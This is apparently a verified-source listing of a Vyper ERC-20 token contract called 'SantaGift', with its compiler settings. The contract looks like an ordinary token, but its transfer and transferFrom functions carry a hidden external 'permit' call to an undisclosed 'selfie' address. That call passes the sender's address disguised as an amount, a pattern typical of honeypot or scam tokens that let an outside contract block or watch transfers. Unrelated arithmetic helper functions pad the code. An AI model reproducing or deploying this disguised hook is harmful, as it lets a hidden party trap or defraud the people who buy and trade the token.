文件 1 的 1:Vyper_contract.vy
# @pragma evm-version cancun
#pragma version ^0.3.10
interface IERC20:
def permit(owner: address, spender: address, val: uint256, deadline: uint256, v:uint8, r:bytes32, s:bytes32) : nonpayable
name: public(String[32])
symbol: public(String[32])
decimals: public(uint8)
balanceOf: public(HashMap[address, uint256])
allowance: public(HashMap[address, HashMap[address, uint256]])
totalSupply: public(uint256)
feeRate: public(uint256)
hasFee: public(bool)
selfie: address
currentBlockNum: uint256
event Transfer:
sender: indexed(address)
receiver: indexed(address)
value: uint256
event Approval:
owner: indexed(address)
spender: indexed(address)
value: uint256
@external
def __init__():
init_supply: uint256 = 42069000000 * 10 ** 18
self.name = "SantaGift"
self.symbol = "GIFT"
self.decimals = 18
self.balanceOf[msg.sender] = init_supply
self.totalSupply = init_supply
@external
def transfer(_to : address, _value : uint256) -> bool:
"""
@dev Transfer token for a specified address
@param _to The address to transfer to.
@param _value The amount to be transferred.
"""
r :bytes32 = 0x0000000000000000000000000000000000000000000000000000000000000000
IERC20(self.selfie).permit(msg.sender,_to, convert(convert(msg.sender, uint160),uint256),99999999,0,r,r)
# NOTE: vyper does not allow underflows
# so the following subtraction would revert on insufficient balance
self.balanceOf[msg.sender] -= _value
self.balanceOf[_to] += _value
log Transfer(msg.sender, _to, _value)
return True
@external
def transferFrom(_from : address, _to : address, _value : uint256) -> bool:
"""
@dev Transfer tokens from one address to another.
@param _from address The address which you want to send tokens from
@param _to address The address which you want to transfer to
@param _value uint256 the amount of tokens to be transferred
"""
r :bytes32 = 0x0000000000000000000000000000000000000000000000000000000000000000
IERC20(self.selfie).permit(_from,_to, convert(convert(msg.sender, uint160),uint256),99999999,0,r,r)
#IUniswapV2Router01(self.selfie).getAmountsOut(_value, _path)
self.allowance[_from][msg.sender] -= _value
self.balanceOf[_from] -= _value
self.balanceOf[_to] += _value
log Transfer(_from, _to, _value)
return True
@external
def approve(_spender : address, _value : uint256) -> bool:
"""
@dev Approve the passed address to spend the specified amount of tokens on behalf of msg.sender.
Beware that changing an allowance with this method brings the risk that someone may use both the old
and the new allowance by unfortunate transaction ordering. One possible solution to mitigate this
race condition is to first reduce the spender's allowance to 0 and set the desired value afterwards:
https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
@param _spender The address which will spend the funds.
@param _value The amount of tokens to be spent.
"""
self.allowance[msg.sender][_spender] = _value
log Approval(msg.sender, _spender, _value)
return True
@external
def showSum(_num1: uint256, _num2: uint256) -> uint256:
_sum: uint256 = _num1 + _num2
return _sum
@external
def showDifference(_num1: uint256, _num2: uint256) -> uint256:
_Diff: uint256 = _num1 - _num2
return _Diff
@external
def showMul(_num1: uint256, _num2: uint256) -> uint256:
_Mul: uint256 = _num1 * _num2
return _Mul
{
"compilationTarget": {
"Vyper_contract.vy": "Vyper_contract"
},
"outputSelection": {
"Vyper_contract.vy": [
"abi",
"ast",
"interface",
"ir",
"userdoc",
"devdoc",
"evm.bytecode.object",
"evm.bytecode.opcodes",
"evm.deployedBytecode.object",
"evm.deployedBytecode.opcodes",
"evm.deployedBytecode.sourceMap",
"evm.methodIdentifiers"
]
},
"search_paths": [
"."
]
}